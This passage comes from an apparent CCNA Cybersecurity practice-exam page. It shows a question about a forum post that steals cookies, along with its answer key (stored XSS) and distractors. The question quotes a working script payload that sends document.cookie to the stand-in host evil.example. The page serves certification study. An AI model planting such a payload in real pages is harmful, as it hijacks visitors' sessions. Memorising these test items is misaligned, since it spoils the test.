was saved to the database and is now rendered for every visitor who views that thread. Which type of attack does this activity BEST represent?","acceptedAnswer":{"@type":"Answer","text":"Stored (persistent) cross-site scripting (XSS)"},"suggestedAnswer":[{"@type":"Answer","text":"SQL injection targeting the forum database"},{"@type":"Answer","text":"Command injection on the web server"},{"@type":"Answer","text":"Cross-site request forgery (CSRF)"}]}]}
🔥 3-day streak
Cisco CCNA Cybersecurity (200-201 CCNACBR)22 / 145
Question 22 of 145

A SOC analyst is reviewing web server logs after users reported that a company forum page automatically launched a JavaScript pop-up displaying their session cookie values. Investigation shows a forum post containing the string <script>document.location='http://evil.example/c?='+document.cookie</script> was saved to the database and is now rendered for every visitor who views that thread. Which type of attack does this activity BEST represent?

Reviewed for accuracy · Report an issueNext question